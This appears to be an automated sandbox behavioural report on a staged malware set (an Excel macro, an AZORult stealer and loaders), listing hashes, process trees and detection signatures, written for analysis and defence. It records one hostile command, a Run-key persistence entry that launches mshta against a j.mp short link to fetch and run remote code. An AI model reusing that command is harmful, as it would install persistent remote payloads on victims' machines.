Overview
overview
10Static
static
10stage1-macro.xls
windows7-x64
10stage1-macro.xls
windows10-2004-x64
10stage5-azorult.exe
windows7-x64
10stage5-azorult.exe
windows10-2004-x64
10stage5-loa...ed.dll
windows7-x64
1stage5-loa...ed.dll
windows10-2004-x64
1stage5-loa...ll.ps1
windows7-x64
3stage5-loa...ll.ps1
windows10-2004-x64
3stage5-loader.dll
windows7-x64
1stage5-loader.dll
windows10-2004-x64
1Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2024 13:38
Behavioral task
behavioral1
Sample
stage1-macro.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
stage1-macro.xls
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
stage5-azorult.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
stage5-azorult.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
stage5-loader-cleaned.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
stage5-loader-cleaned.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
stage5-loader-powershell.ps1
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
stage5-loader-powershell.ps1
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
stage5-loader.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
stage5-loader.dll
Resource
win10v2004-20240802-en
General
-
Target
stage1-macro.xls
-
Size
36KB
-
MD5
0f49e06aaab8816a9d95815e749fb291
-
SHA1
e124c99646e1d7fa682e465630eda2159172dcb1
-
SHA256
f5190d29af5ba58c45b138751593e2f5ed014d42e5c37f05f6ea98ee8838c9e2
-
SHA512
c09fa102c120b8e3cd7cddd88fa7d228f551be6ba81727bff8dbab84520bc7e456e82288fa91a86d18b9447fe3e2e866fc2dc4733d19b84666a4cdbfb50308e0
-
SSDEEP
384:AGF3dXzjwE8qUGiKu7kriCj1wnb9uCFtw5HNqldMbhuDBfrgfXGvmeeernB/:VdDD8qji/7GikKu0YHT9vv
Malware Config
Signatures
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2824 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4756 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3948 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2268 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 904 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4532 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3348 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2540 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4880 4960 ipconfig.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 940 4960 ipconfig.exe EXCEL.EXE -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fgiopoiuytresdfgh = "\"mshta\"\"http:\\\\j.mp\\fgiopoiuytresdfgh\"" EXCEL.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Gathers network information 2 TTPs 10 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exepid process 4756 ipconfig.exe 4532 ipconfig.exe 3348 ipconfig.exe 2540 ipconfig.exe 4880 ipconfig.exe 2824 ipconfig.exe 3948 ipconfig.exe 2268 ipconfig.exe 904 ipconfig.exe 940 ipconfig.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4960 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
EXCEL.EXEpid process 4960 EXCEL.EXE 4960 EXCEL.EXE 4960 EXCEL.EXE 4960 EXCEL.EXE 4960 EXCEL.EXE 4960 EXCEL.EXE 4960 EXCEL.EXE 4960 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 4960 wrote to memory of 2824 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 2824 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 2268 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 2268 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 3948 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 3948 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 4756 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 4756 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 940 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 940 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 4880 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 4880 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 2540 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 2540 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 3348 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 3348 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 4532 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 4532 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 904 4960 EXCEL.EXE ipconfig.exe PID 4960 wrote to memory of 904 4960 EXCEL.EXE ipconfig.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\stage1-macro.xls"1⤵
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:2824
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:2268
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:3948
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:4756
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:940
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:4880
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:2540
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:3348
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:4532
-
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
PID:904
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD57ab85d5243fdef906df661b504ada963
SHA1550b5bee166de9b7a400f0606b94bf7f80f706d3
SHA256d4595e3e9b80fddd5d64872c2b1249caa1fedae1b61bb8c97095d9341c22407d
SHA512e36f8074054e8181870ea90430c648e169822c4ba67e46fdb253632b302d7fdaa75a7f3dbdb73182955ef434f8955f42bb6b0d97c425eed3bdb47a23fb99c11c